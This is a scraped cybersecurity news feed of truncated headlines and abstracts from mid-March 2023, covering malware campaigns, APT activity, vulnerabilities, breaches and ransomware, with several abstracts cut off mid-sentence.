An Android voice phishing (aka vishing) malware campaign known as FakeCalls has reared its head once again to target South Korean users under the guise of over 20 popular financial apps. "FakeCalls malware possesses the functionality of a Swiss army knife, able not only to conduct its primary aim but also to extract private data from the victim's device," cybersecurity firm Check Point said . FakeCalls was previously documented by Kaspersky in April 2022, describing the malware's capabilities to imitate phone conversations with a bank customer support agent. In the observed attacks, users who install the rogue banking app are enticed into calling the financial institution by offering a fake low-interest loan. At the point where the phone call actually happens, a pre-recorded audio with instructions from the real bank is played. Simultaneously, the malware conceals the phone number with the bank's legitimate number to give the impression that a conversationThe Hacker News
March 17, 2023 – Insider Threat
Top 5 Insider Threats to Look Out For in 2023 Full Text
Abstract
Unquestionably, 'insider threats' is one of the most neglected aspects of cybersecurity and some companies fail to recognize associated dangers. Cyberattacks are growing more complex as technology advances. Many businesses concentrate their cybersecurity...Security Affairs
March 17, 2023 – Phishing
SVB account holders targeted with phishing, scams Full Text
Abstract
After news broke late last week about Silicon Valley Bank’s bank run and collapse, security researchers started warning SVB account holders about incoming SVB-related scams and phishing attempts.Cyware
March 17, 2023 – Solution
THN Webinar: 3 Research-Backed Ways to Secure Your Identity Perimeter Full Text
Abstract
Think of the typical portrayal of a cyberattack. Bad guy pounding furiously on a keyboard, his eyes peeking out from under a dark hoodie. At long last, his efforts pay off and he hits the right combination of keys. "I'm in!" he shouts in triumph. Clearly, there are many problems with this scenario – and it's not just the hoodie. What's even more inaccurate is that most cyber attackers today do not rely on unsophisticated methods like brute force. Instead, they target users directly through social engineering, spearphishing and business email compromise (BEC). In light of this, it can be said that cybercriminals no longer break into corporate systems; instead, they log in with valid user credentials. In this landscape of highly targeted cyberattacks, the identity perimeter has emerged as a crucial battlefield. Unfortunately, too many businesses continue to rely on outdated security strategies and tools that leave their users and sensitive systems unprotected. SThe Hacker News
March 17, 2023 – APT
China-linked APT likely linked to Fortinet zero-day attacks Full Text
Abstract
An alleged Chinese threat actor group is behind attacks on government organizations exploiting a Fortinet zero-day flaw (CVE-2022-41328). A suspected China-linked group is exploiting a Fortinet zero-day vulnerability, tracked as CVE-2022-41328, in attacks...Security Affairs
March 17, 2023 – Breach
Data Breach at Tuscaloosa’s NorthStar Paramedic Services Could Impact 82,000 Patients Full Text
Abstract
On Tuesday, NorthStar Emergency Paramedic Services took to its website to report the problem and mailed physical letters to patients who may have been impacted by the breach. The company said they became aware of the potential intrusion in September.Cyware
March 17, 2023 – Vulnerabilities
New GoLang-Based HinataBot Exploiting Router and Server Flaws for DDoS Attacks Full Text
Abstract
A new Golang-based botnet dubbed HinataBot has been observed to leverage known flaws to compromise routers and servers and use them to stage distributed denial-of-service (DDoS) attacks. "The malware binaries appear to have been named by the malware author after a character from the popular anime series, Naruto, with file name structures such as 'Hinata-The Hacker News
March 17, 2023 – Solution
Meta Develops New Kill Chain Thesis Full Text
Abstract
The Meta approach starts from the assumption that despite the asynchronous nature of attacks, there are still meaningful commonalities, especially where those commonalities can be abstracted from the platform or hardware being attacked.Cyware
March 17, 2023 – Education
A New Security Category Addresses Web-borne Threats Full Text
Abstract
In the modern corporate IT environment, which relies on cloud connectivity, global connections and large volumes of data, the browser is now the most important work interface. The browser connects employees to managed resources, devices to the web, and the on-prem environment to the cloud one. Yet, and probably unsurprisingly, this browser prominence has significantly increased the number of threats that adversaries target the browser with. Attackers are now leveraging the browser's core functionality - rendering and executing web pages for users to access - to perform attacks. The browser is now an attack surface, as well as an attack vector for malicious access to corporate SaaS and web applications through account takeover and the use of compromised credentials. To address this issue, a new guide was recently published ( Download Here ). It analyzes what a solution to these threats would look like. The guide, "Protection from web-borne threats starts with Browser SecuritThe Hacker News
March 17, 2023 – Cryptocurrency
Trojanized WhatsApp and Telegram Apps Go After Victims’ Cryptocurrency Wallets Full Text
Abstract
Threat actors are going after victims’ cryptocurrency funds using trojanized Telegram and WhatsApp applications for Android and Windows. The malware can switch cryptocurrency wallet addresses sent in chat messages with attackers' wallet addresses.Cyware
March 17, 2023 – Phishing
Lookalike Telegram and WhatsApp Websites Distributing Cryptocurrency Stealing Malware Full Text
Abstract
Copycat websites for instant messaging apps like Telegram and WhatApp are being used to distribute trojanized versions and infect Android and Windows users with cryptocurrency clipper malware . "All of them are after victims' cryptocurrency funds, with several targeting cryptocurrency wallets," ESET researchers Lukáš Štefanko and Peter Strýček said in a new analysis. While the first instance of clipper malware on the Google Play Store dates back to 2019, the development marks the first time Android-based clipper malware has been built into instant messaging apps. "Moreover, some of these apps use optical character recognition (OCR) to recognize text from screenshots stored on the compromised devices, which is another first for Android malware," the Slovak cybersecurity firm added. The attack chain begins with unsuspecting users clicking on fraudulent ads on Google search results that lead to hundreds of sketchy YouTube channels, which then direct themThe Hacker News
March 17, 2023 – APT
Winter Vivern APT Group Targeting Indian, Lithuanian, Slovakian, and Vatican Officials Full Text
Abstract
The advanced persistent threat known as Winter Vivern has been linked to campaigns targeting government officials in India, Lithuania, Slovakia, and the Vatican since 2021. The activity targeted Polish government agencies, the Ukraine Ministry of Foreign Affairs, the Italy Ministry of Foreign Affairs, and individuals within the Indian government, SentinelOne said in a report shared with The Hacker News. "Of particular interest is the APT's targeting of private businesses, including telecommunications organizations that support Ukraine in the ongoing war," senior threat researcher Tom Hegel said . Winter Vivern, also tracked as UAC-0114, drew attention last month after the Computer Emergency Response Team of Ukraine (CERT-UA) detailed a new malware campaign aimed at state authorities of Ukraine and Poland to deliver a piece of malware dubbed Aperetif. Previous public reports chronicling the group show that it has leveraged weaponized Microsoft Excel documents conThe Hacker News
March 17, 2023 – Vulnerabilities
Google Uncovers 18 Severe Security Vulnerabilities in Samsung Exynos Chips Full Text
Abstract
Google is calling attention to a set of severe security flaws in Samsung's Exynos chips, some of which could be exploited remotely to completely compromise a phone without requiring any user interaction. The 18 zero-day vulnerabilities affect a wide range of Android smartphones from Samsung, Vivo, Google, wearables using the Exynos W920 chipset, and vehicles equipped with the Exynos Auto T5123 chipset. Four of the 18 flaws make it possible for a threat actor to achieve internet-to-Samsung, Vivo, and Google, as well as wearables using the Exynos W920 chipset and vehicleses in late 2022 and early 2023, said. "[The] four vulnerabilities allow an attacker to remotely compromise a phone at the baseband level with no user interaction, and require only that the attacker know the victim's phone number," Tim Willis, head of Google Project Zero, said . In doing so, a threat actor could gain entrenched access to cellular information passing in and out of the targeted deviThe Hacker News
March 16, 2023 – Malware
New dotRunpeX Malware Injector Spotted in the Wild Full Text
Abstract
Check Point Research laid bare tech details of the dotRunpeX injector that delivers a range of known malware families such as AgentTesla, AsyncRat, AveMaria/WarzoneRAT, BitRAT, Formbook, and more. The first-stage loaders are primarily delivered via phishing emails that contain malicious ... Read MoreCyware
March 16, 2023 – Hacker
Chinese and Russian Hackers Using SILKLOADER Malware to Evade Detection Full Text
Abstract
Threat activity clusters affiliated with the Chinese and Russian cybercriminal ecosystems have been observed using a new piece of malware that's designed to load Cobalt Strike onto infected machines. Dubbed SILKLOADER by Finnish cybersecurity company WithSecure, the malware leverages DLL side-loading techniques to deliver commercial adversary simulation software. The development comes as improved detection capabilities against Cobalt Strike, a legitimate post-exploitation tool used for red team operations, is forcing threat actors to seek alternative options or concoct new ways to propagate the framework to evade detection. "The most common of these include adding complexity to the auto-generated beacon or stager payloads via the utilization of packers, crypters, loaders, or similar techniques," WithSecure researchers said . SILKLOADER joins other loaders such as KoboldLoader, MagnetLoader, and LithiumLoader that have been recently discovered incorporatingThe Hacker News
March 16, 2023 – Vulnerabilities
Baseband RCE flaws in Samsung’s Exynos chipsets expose devices to remote hack Full Text
Abstract
Google’s Project Zero hackers found multiple flaws in Samsung ’s Exynos chipsets that expose devices to remote hack with no user interaction. White hat hackers at Google's Project Zero unit discovered multiple vulnerabilities Samsung ’s Exynos...Security Affairs
March 16, 2023 – Hacker
Hackers Use AI-Generated YouTube Videos to Spread Info-stealers Full Text
Abstract
CloudSEK witnessed a 200-300% month-on-month surge in AI-generated YouTube videos about software cracks containing malicious links to a variety of stealer malware such as Raccoon, RedLine, and Vidar. To make the videos appear at the top of the results, threat actors employ SEO poisoning techniques. ... Read MoreCyware
March 16, 2023 – Cryptocurrency
Cryptojacking Group TeamTNT Suspected of Using Decoy Miner to Conceal Data Exfiltration Full Text
Abstract
The cryptojacking group known as TeamTNT is suspected to be behind a previously undiscovered strain of malware used to mine Monero cryptocurrency on compromised systems. That's according to Cado Security, which found the sample after Sysdig detailed a sophisticated attack known as SCARLETEEL aimed at containerized environments to ultimately steal proprietary data and software. Specifically, the early phase of the attack chain involved the use of a cryptocurrency miner, which the cloud security firm suspected was deployed as a decoy to conceal the detection of data exfiltration. The artifact – uploaded to VirusTotal late last month – "bear[s] several syntactic and semantic similarities to prior TeamTNT payloads, and includes a wallet ID that has previously been attributed to them," a new analysis from Cado Security has revealed . TeamTNT , active since at least 2019, has been documented to repeatedly strike cloud and container environments to deploy cryptocurThe Hacker News
March 16, 2023 – Government
Microsoft sheds light on a year of Russian hybrid warfare in Ukraine Full Text
Abstract
Russia-linked threat actors targeted at least 17 European nations in 2023, and 74 countries since the start of the invasion of Ukraine. Microsoft revealed that Russia-linked threat actors targeted at least 17 European nations between January and mid-February...Security Affairs
March 16, 2023 – Criminals
Makop Ransomware Gang: A Detailed Look Full Text
Abstract
Cybersecurity researcher Luca Mella shared technical insights on the Makop ransomware that attains persistence through dedicated .NET tools. To access victim networks, the gang makes use of internet-facing bugs and exposed remote administrative services. The operators began to work for their crimin ... Read MoreCyware
March 16, 2023 – Criminals
Authorities Shut Down ChipMixer Platform Tied to Crypto Laundering Scheme Full Text
Abstract
A coalition of law enforcement agencies across Europe and the U.S. announced the takedown of ChipMixer, an unlicensed cryptocurrency mixer that began its operations in August 2017. "The ChipMixer software blocked the blockchain trail of the funds, making it attractive for cybercriminals looking to launder illegal proceeds from criminal activities such as drug trafficking, weapons trafficking, ransomware attacks, and payment card fraud," Europol said in a statement. The coordinated exercise, besides dismantling the clearnet and dark web websites associated with ChipMixer, also resulted in the seizure of $47.5 million in Bitcoin and 7 TB of data. Mixers, also called tumblers, offer full anonymity for a fee by commingling cryptocurrency from different users – both legitimate and criminally-derived funds – in a manner that makes it hard to trace the origins. This is achieved by funneling different payments into a single pool before splitting up each amount and transmitThe Hacker News
March 16, 2023 – Government
Polish intelligence dismantled a network of Russian spies Full Text
Abstract
Polish intelligence dismantled a cell of Russian spies that gathered info on military equipment deliveries to Ukraine via the EU member. Polish counter-intelligence has dismantled a cell of Russian spies that gathered information on the provisioning...Security Affairs
March 16, 2023 – Vulnerabilities
Mozilla Patches High-Severity Vulnerabilities With Release of Firefox 111 Full Text
Abstract
Mozilla announced this week the release of Firefox 111, which patches over a dozen vulnerabilities, including potentially serious issues. Of the 13 CVEs, seven have been assigned a ‘high’ severity rating.Cyware
March 16, 2023 – General
What’s Wrong with Manufacturing? Full Text
Abstract
In last year's edition of the Security Navigator we noted that the Manufacturing Industry appeared to be totally over-represented in our dataset of Cyber Extortion victims. Neither the number of businesses nor their average revenue particularly stood out to explain this. Manufacturing was also the most represented Industry in our CyberSOC dataset – contributing more Incidents than any other sector. We found this trend confirmed in 2023 – so much in fact that we decided to take a closer look. So let's examine some possible explanations. And debunk them. Hunting for possible explanations Manufacturing is still the most impacted industry in our Cyber Extortion dataset in 2023, as tracked by monitoring double-extortion leak sites. Indeed, this sector now represents more than 20% of all victims since we started observing the leak sites in the beginning of 2020. Approximately 28% of all our clients are from Manufacturing, contributing with an overall share of 31% of all pThe Hacker News
March 16, 2023 – Attack
Multiple threat actors exploited Progress Telerik bug to breach U.S. federal agency Full Text
Abstract
Multiple threat actors exploited a critical flaw in Progress Telerik to breach an unnamed US federal agency, said the US government. A joint advisory issued by the Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation...Security Affairs
March 16, 2023 – General
Cyber attribution: Vigilance or distraction? Full Text
Abstract
The importance of attribution depends on the organization involved and whether it can see an investigation through. With investigations taking lots of time and resources, it shouldn’t be an organization’s priority in the event of a breach.Cyware
March 16, 2023 – Attack
Multiple Hacker Groups Exploit 3-Year-Old Vulnerability to Breach U.S. Federal Agency Full Text
Abstract
Multiple threat actors, including a nation-state group, exploited a critical three-year-old security flaw in Progress Telerik to break into an unnamed federal entity in the U.S. The disclosure comes from a joint advisory issued by the Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and Multi-State Information Sharing and Analysis Center (MS-ISAC). "Exploitation of this vulnerability allowed malicious actors to successfully execute remote code on a federal civilian executive branch (FCEB) agency's Microsoft Internet Information Services (IIS) web server," the agencies said . The indicators of compromise (IoCs) associated with the digital break-in were identified from November 2022 through early January 2023. Tracked as CVE-2019-18935 (CVSS score: 9.8), the issue relates to a .NET deserialization vulnerability affecting Progress Telerik UI for ASP.NET AJAX that, if left unpatched, could lead to remote code execThe Hacker News
March 16, 2023 – Government
CISA adds Adobe ColdFusion bug to Known Exploited Vulnerabilities Catalog Full Text
Abstract
US CISA added an actively exploited vulnerability in Adobe ColdFusion to its Known Exploited Vulnerabilities Catalog. U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical vulnerability in Adobe ColdFusion, tracked as CVE-2023-26360 (CVSS...Security Affairs
March 16, 2023 – Policy and Law
Two Hackers Charged With Accessing Federal Law Enforcement Database Full Text
Abstract
The two hackers, belonging to the "ViLE" crime group, allegedly broke into a federal law enforcement database. They also used a compromised Bangladeshi police officer's email to fraudulently request user data from a social media company.Cyware
March 16, 2023 – Government
CISA Issues Urgent Warning: Adobe ColdFusion Vulnerability Exploited in the Wild Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on March 15 added a security vulnerability impacting Adobe ColdFusion to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The critical flaw in question is CVE-2023-26360 (CVSS score: 8.6), which could be exploited by a threat actor to achieve arbitrary code execution. "Adobe ColdFusion contains an improper access control vulnerability that allows for remote code execution," CISA said . The vulnerability impacts ColdFusion 2018 (Update 15 and earlier versions) and ColdFusion 2021 (Update 5 and earlier versions). It has been addressed in versions Update 16 and Update 6, respectively, released on March 14, 2023. It's worth noting that CVE-2023-26360 also affects ColdFusion 2016 and ColdFusion 11 installations, both of which are no longer supported by the software company as they have reached end-of-life (EoL). While the exact details surrounding the natuThe Hacker News
March 16, 2023 – Government
CISA says federal civilian agency hacked by nation-state and criminal hacking groups Full Text
Abstract
According to the alert, both the unnamed nation-backed hacking group and the criminal group dubbed XE Group exploited known vulnerabilities in Progress Telerik software located in the unnamed government agency’s Microsoft IIS web server.Cyware
March 16, 2023 – General
Google Proposes Reducing TLS Cert Life Span to 90 Days Full Text
Abstract
By virtue of Chrome's market share, if Google makes this change for Chrome, that makes it a de facto standard that every commercial public certificate authority would have to follow.Cyware
March 15, 2023 – Breach
Key Aerospace Player Safran Group Leaks Sensitive Data Full Text
Abstract
The Cybernews research team recently discovered that the French-based multinational aviation company, the eighth largest aerospace supplier worldwide, was leaking sensitive data due to a misconfiguration of its systems.Cyware
March 15, 2023 – Hacker
YoroTrooper Stealing Credentials and Information from Government and Energy Organizations Full Text
Abstract
A previously undocumented threat actor dubbed YoroTrooper has been targeting government, energy, and international organizations across Europe as part of a cyber espionage campaign that has been active since at least June 2022. "Information stolen from successful compromises include credentials from multiple applications, browser histories and cookies, system information and screenshots," Cisco Talos researchers Asheer Malhotra and Vitor Ventura said in a Tuesday analysis. Prominent countries targeted include Azerbaijan, Tajikistan, Kyrgyzstan, Turkmenistan, and other Commonwealth of Independent States (CIS) nations. The threat actor is believed to be Russian-speaking owing to the victimology patterns and the presence of Cyrillic snippets in some of the implants. That said, the YoroTrooper intrusion set has been found to exhibit tactical overlaps with the PoetRAT team that was documented in 2020 as leveraging coronavirus-themed baits to strike government and eneThe Hacker News
March 15, 2023 – APT
Russia-linked APT29 abuses EU information exchange systems in recent attacks Full Text
Abstract
Russia-linked APT29 group abused the legitimate information exchange systems used by European countries to target government entities. Russia-linked APT29 (aka SVR group, Cozy Bear, Nobelium, and The Dukes) was spotted abusing the legitimate information...Security Affairs
March 15, 2023 – Criminals
Criminals already targeting nervous CVB customers Full Text
Abstract
According to various researchers and security firms, threat actors are already out hunting for SVB-exposed prey through both passive and active phishing scams, including similar fake domains and business email compromise (BEC) attacks.Cyware
March 15, 2023 – Cryptocurrency
New Cryptojacking Operation Targeting Kubernetes Clusters for Dero Mining Full Text
Abstract
Cybersecurity researchers have discovered the first-ever illicit cryptocurrency mining campaign used to mint Dero since the start of February 2023. "The novel Dero cryptojacking operation concentrates on locating Kubernetes clusters with anonymous access enabled on a Kubernetes API and listening on non-standard ports accessible from the internet," CrowdStrike said in a new report shared with The Hacker News. The development marks a notable shift from Monero, which is a prevalent cryptocurrency used in such campaigns. It's suspected it may have to do with the fact that Dero "offers larger rewards and provides the same or better anonymizing features." The attacks, attributed to an unknown financially motivated actor, commence with scanning for Kubernetes clusters with authentication set as --anonymous-auth=true , which allows anonymous requests to the server, to drop initial payloads from three different U.S.-based IP addresses. This includes deployingThe Hacker News
March 15, 2023 – APT
YoroTrooper APT group targets CIS countries and embassies Full Text
Abstract
A new APT group, dubbed YoroTrooper, has been targeting government and energy organizations across Europe, experts warn. Cisco Talos researchers uncovered a new cyber espionage group targeting CIS countries, embassies and EU health care agency since...Security Affairs
March 15, 2023 – Policy and Law
ISO27001 Updates: Change is afoot Full Text
Abstract
The standard hasn't had a significant update since 2013. There were some minor amendments in 2017, but largely these were structural or grammatical updates. In 2022, things have changed dramatically, but also in very subtle ways.Cyware
March 15, 2023 – Education
The Different Methods and Stages of Penetration Testing Full Text
Abstract
The stakes could not be higher for cyber defenders. With the vast amounts of sensitive information, intellectual property, and financial data at risk, the consequences of a data breach can be devastating. According to a report released by Ponemon institute , the cost of data breaches has reached an all-time high, averaging $4.35 million in 2022. Vulnerabilities in web applications are often the primary gateway for attackers. According to a World Economic Forum report , just one week after discovering a critical security flaw in a widely used software library (Log4j), more than 100 attempts at exploiting the vulnerability were detected every minute. This illustrates how quickly malicious actors can take advantage of vulnerabilities, highlighting the urgency of regularly assessing and monitoring your system for any vulnerabilities or weak points. The complexity of addressing security challenges in today's digital world is further compounded by the rising use of open-source compoThe Hacker News
March 15, 2023 – Cryptocurrency
CrowdStrike discovered the first-ever Dero cryptocurrency mining campaign Full Text
Abstract
CrowdStrike researchers discovered the first-ever cryptocurrency mining campaign aimed at Dero mining since February 2023. CrowdStrike has discovered the first-ever Dero cryptojacking campaign aimed at Kubernetes infrastructure. Dero is a general-purpose,...Security Affairs
March 15, 2023 – Attack
Ring Denies Falling Victim to Ransomware Attack Full Text
Abstract
On Monday, the cybergang behind the Alphv ransomware added an entry to their leaks site claiming they breached Ring and threatening to release data supposedly stolen from the company.Cyware
March 15, 2023 – APT
Tick APT Targeted High-Value Customers of East Asian Data-Loss Prevention Company Full Text
Abstract
A cyberespionage actor known as Tick has been attributed with high confidence to a compromise of an East Asian data-loss prevention (DLP) company that caters to government and military entities. "The attackers compromised the DLP company's internal update servers to deliver malware inside the software developer's network, and trojanized installers of legitimate tools used by the company, which eventually resulted in the execution of malware on the computers of the company's customers," ESET researcher Facundo Muñoz said . Tick , also known as Bronze Butler, REDBALDKNIGHT , Stalker Panda, and Stalker Taurus, is a suspected China-aligned collective that has primarily gone after government, manufacturing, and biotechnology firms in Japan. It's said to be active since at least 2006 . Other lesser-known targets include Russian, Singaporean, and Chinese enterprises. Attack chains orchestrated by the group have typically leveraged spear-phishing emails and strThe Hacker News
March 15, 2023 – Breach
Security Firm Rubrik breached by Clop gang through GoAnywhere Zero-Day exploitation Full Text
Abstract
Data security firm Rubrik discloses a data breach, attackers exploited recent GoAnywhere zero-day to steal its data. Cybersecurity firm Rubrik disclosed a data breach, a ransomware group stolen compeny data by exploiting the recently disclosed zero-day...Security Affairs
March 15, 2023 – Government
Rishi Sunak hints at TikTok ban from UK government devices Full Text
Abstract
Rishi Sunak has indicated that the UK could follow the US and Canada in banning TikTok from government devices, saying he will take “whatever steps are necessary” to protect Britain’s security.Cyware
March 15, 2023 – Vulnerabilities
Microsoft Rolls Out Patches for 80 New Security Flaws — Two Under Active Attack Full Text
Abstract
Microsoft's Patch Tuesday update for March 2023 is rolling out with remediations for a set of 80 security flaws , two of which have come under active exploitation in the wild. Eight of the 80 bugs are rated Critical, 71 are rated Important, and one is rated Moderate in severity. The updates are in addition to 29 flaws the tech giant fixed in its Chromium-based Edge browser in recent weeks. The two vulnerabilities that have come under active attack include a Microsoft Outlook privilege escalation flaw ( CVE-2023-23397 , CVSS score: 9.8) and a Windows SmartScreen security feature bypass ( CVE-2023-24880 , CVSS score: 5.1). CVE-2023-23397 is "triggered when an attacker sends a message with an extended MAPI property with a UNC path to an SMB (TCP 445) share on a threat actor-controlled server," Microsoft said in a standalone advisory. A threat actor could leverage this flaw by sending a specially crafted email, activating it automatically when it is retrieved and prThe Hacker News
March 15, 2023 – Breach
Key aerospace player Safran Group leaks sensitive data Full Text
Abstract
Top aviation company Safran Group left itself vulnerable to cyberattacks, likely for well over a year, underlining how vulnerable big aviation firms are to threat actors, according to research by Cybernews. Original post at https://cybernews.com/security/key-aerospace-player-leaks-sensitive-data/ The...Security Affairs
March 15, 2023 – Attack
YoroTrooper Espionage Campaigns Targeting CIS Countries, Embassies, and EU Healthcare Agency Full Text
Abstract
YoroTrooper’s main tools include Python-based, custom-built, and open-source information stealers, such as the Stink stealer wrapped into executables via the Nuitka framework and PyInstaller.Cyware
March 15, 2023 – Solution
Kali Linux 2023.1 released – and so is Kali Purple! Full Text
Abstract
OffSec (formerly Offensive Security) released Kali Linux 2023.1, the latest version of its popular penetration testing and digital forensics platform, accompanied by a technical preview of Kali Purple, a “one-stop shop for blue and purple teams.”Cyware
March 14, 2023 – Phishing
DEV-1101 Offers Phishing Kit for High-Volume AiTM Campaigns Full Text
Abstract
Microsoft Threat Intelligence stumbled across an open source adversary-in-the-middle (AiTM) phishing kit that furthers the ability of hackers to launch organized attacks and also scale it. The threat actor behind the kit is being tracked under the moniker DEV-1101. The kit’s features include settin ... Read MoreCyware
March 14, 2023 – Breach
GoBruteforcer: New Golang-Based Malware Breaches Web Servers Via Brute-Force Attacks Full Text
Abstract
A new Golang-based malware dubbed GoBruteforcer has been found targeting web servers running phpMyAdmin, MySQL, FTP, and Postgres to corral the devices into a botnet. "GoBruteforcer chose a Classless Inter-Domain Routing ( CIDR ) block for scanning the network during the attack, and it targeted all IP addresses within that CIDR range," Palo Alto Networks Unit 42 researchers said . "The threat actor chose CIDR block scanning as a way to get access to a wide range of target hosts on different IPs within a network instead of using a single IP address as a target." The malware is mainly designed to single out Unix-like platforms running x86, x64 and ARM architectures, with GoBruteforcer attempting to obtain access via a brute-force attack using a list of credentials hard-coded into the binary. If the attack proves to be successful, an internet relay chat ( IRC ) bot is deployed on the victim server to establish communications with an actor-controlled server.The Hacker News
March 14, 2023 – Criminals
LockBit Ransomware gang claims to have stolen SpaceX confidential data from Maximum Industries Full Text
Abstract
The LockBit ransomware group claims to have stolen confidential data belonging to SpaceX from the systems of Maximum Industries. The LockBit ransomware gang claims to have stolen confidential data of SpaceX after they hacked the systems of production...Security Affairs
March 14, 2023 – Vulnerabilities
Siemens Addresses Over 90 Vulnerabilities for ICS Patch Tuesday Full Text
Abstract
Siemens has released only seven new advisories, but they describe a total of 92 vulnerabilities. However, a vast majority are introduced by the use of third-party components rather than being specific to Siemens products.Cyware
March 14, 2023 – Ransomware
The Prolificacy of LockBit Ransomware Full Text
Abstract
Today, the LockBit ransomware is the most active and successful cybercrime organization in the world. Attributed to a Russian Threat Actor, LockBit has stepped out from the shadows of the Conti ransomware group, who were disbanded in early 2022. LockBit ransomware was first discovered in September 2019 and was previously known as ABCD ransomware because of the ".abcd virus" extension first observed. LockBit operates as a Ransomware-as-a-service (RaaS) model. In short, this means that affiliates make a deposit to use the tool, then split the ransom payment with the LockBit group. It has been reported that some affiliates are receiving a share as high of 75%. LockBit's operators have posted advertisements for their affiliate program on Russian-language criminal forums stating they will not operate in Russia or any CIS countries, nor will they work with English-speaking developers unless a Russian-speaking "guarantor" vouches for them. Initial attack vectors ofThe Hacker News
March 14, 2023 – Vulnerabilities
Microsoft Patch Tuesday fix Outlook zero-day actively exploited Full Text
Abstract
Microsoft Patch Tuesday updates for March 2023 addressed 74 vulnerabilities, including a Windows zero-day exploited in ransomware attacks. Microsoft Patch Tuesday security updates for March 2023 addressed 74 new vulnerabilities in Microsoft Windows...Security Affairs
March 14, 2023 – Attack
Hospital in Brussels latest victim in spate of European healthcare cyberattacks Full Text
Abstract
Ambulances were diverted from the Centre Hospitalier Universitaire (CHU) Saint-Pierre this weekend following the attack in the early hours of Friday morning. Details about the attack and the perpetrators have not yet been disclosed.Cyware
March 14, 2023 – Phishing
Microsoft Warns of Large-Scale Use of Phishing Kits to Send Millions of Emails Daily Full Text
Abstract
An open source adversary-in-the-middle ( AiTM ) phishing kit has found a number of takers in the cybercrime world for its ability to orchestrate attacks at scale. Microsoft Threat Intelligence is tracking the threat actor behind the development of the kit under its emerging moniker DEV-1101 . An AiTM phishing attack typically involves a threat actor attempting to steal and intercept a target's password and session cookies by deploying a proxy server between the user and the website. Such attacks are more effective owing to their ability to circumvent multi-factor authentication (MFA) protections. DEV-1101, per the tech giant, is said to be the party behind several phishing kits that can be purchased or rented by other criminal actors, thereby reducing the effort and resources required to launch a phishing campaign. "The availability of such phishing kits for purchase by attackers is part of the industrialization of the cybercriminal economy and lowers the barrier ofThe Hacker News
March 14, 2023 – Vulnerabilities
Adobe fixed ColdFusion flaw listed as under active exploit Full Text
Abstract
Adobe is warning that a critical zero-day flaw in ColdFusion web app development platform was exploited in very limited attacks. Software giant Adobe released security updates for ColdFusion versions 2021 and 2018 to resolve a critical flaw, tracked...Security Affairs
March 14, 2023 – Business
Grip Security Receives Investment from The Syndicate Group Full Text
Abstract
The Boston, MA, and Tel Aviv, Israel-based SaaS security company unifying discovery, access control, and data governance, received an investment from The Syndicate Group. The amount of the deal was not disclosed.Cyware
March 14, 2023 – Vulnerabilities
Fortinet FortiOS Flaw Exploited in Targeted Cyberattacks on Government Entities Full Text
Abstract
Government entities and large organizations have been targeted by an unknown threat actor by exploiting a security flaw in Fortinet FortiOS software to result in data loss and OS and file corruption. "The complexity of the exploit suggests an advanced actor and that it is highly targeted at governmental or government-related targets," Fortinet researchers Guillaume Lovet and Alex Kong said in an advisory last week. The zero-day flaw in question is CVE-2022-41328 (CVSS score: 6.5), a medium security path traversal bug in FortiOS that could lead to arbitrary code execution. "An improper limitation of a pathname to a restricted directory vulnerability ('path traversal') [CWE-22] in FortiOS may allow a privileged attacker to read and write arbitrary files via crafted CLI commands," the company noted. The shortcoming impacts FortiOS versions 6.0, 6.2, 6.4.0 through 6.4.11, 7.0.0 through 7.0.9, and 7.2.0 through 7.2.3. Fixes are available in versions 6.4.1The Hacker News
March 14, 2023 – Phishing
DEV-1101 AiTM phishing kit is fueling large-scale phishing campaigns Full Text
Abstract
Microsoft warns of large-scale phishing attacks orchestrated with an open-source adversary-in-the-middle (AiTM) phishing kit available in the cybercrime ecosystem Adversary-in-the-middle (AiTM) phishing kits are becoming an essential technology in the cybercrime...Security Affairs
March 14, 2023 – Criminals
LockBit Claims it Stole SpaceX Schematics From Parts Supplier, Threatens to Leak Them Full Text
Abstract
Ransomware gang Lockbit has boasted it broke into Maximum Industries, which makes parts for SpaceX, and stole 3,000 proprietary schematics developed by Elon Musk's rocketeers.Cyware
March 14, 2023 – Attack
Advanced actor targets Fortinet FortiOS in attacks on govt entities Full Text
Abstract
An unknown threat actor is targeting Government entities and large organizations by exploiting a security flaw in Fortinet FortiOS. Fortinet researchers are warning of an advanced threat actor and is targeting governmental or government-related entities. The...Security Affairs
March 14, 2023 – Malware
New Fake ChatGPT Chrome Extension Stealing Facebook Ad Accounts with Thousands of Installs Full Text
Abstract
A Chrome Extension offering quick access to fake ChatGPT functionality was found to be hijacking Facebook accounts and installing hidden account backdoors. Notably, the Facebook app “backdoor” gives the threat actors super-admin permissions.Cyware
March 14, 2023 – Criminals
Dissecting the malicious arsenal of the Makop ransomware gang Full Text
Abstract
Cyber security researcher Luca Mella analyzed the Makop ransomware employed in a recent intrusion. Executive summary Insights from a recent intrusion authored by Makop ransomware operators show persistence capability through dedicated .NET tools. Makop...Security Affairs
March 14, 2023 – General
Counting ICS Vulnerabilities: Examining Variations in Numbers Reported by Security Firms Full Text
Abstract
Reports published in the past couple of months by various industrial cybersecurity companies provide different numbers when it comes to the vulnerabilities discovered in industrial control system (ICS) products in 2022.Cyware
March 14, 2023 – Hacker
Pro-Russian Hackers Blackmail Ukrainian Developer of S.T.A.L.K.E.R. 2 Game Full Text
Abstract
GSC Game World says it has been enduring cyberattacks for ‘more than a year’ and that hackers demand Russia-friendly changes to the game or else they’ll leak tons of the game’s development materials.Cyware
March 13, 2023 – Malware
Golang-based GoBruteforcer Malware Targets Popular Web Services Full Text
Abstract
GoBruteforcer, a new Golang-based botnet, has been seen scanning and infecting well-known web servers including FTP and MySQL, and deploys an IRC bot to communicate. At the time of the attack, GoBruteforcer uses a Classless Inter-Domain Routing (CIDR) block for scanning the network. The best w ... Read MoreCyware
March 13, 2023 – Attack
Large-scale Cyber Attack Hijacks East Asian Websites for Adult Content Redirects Full Text
Abstract
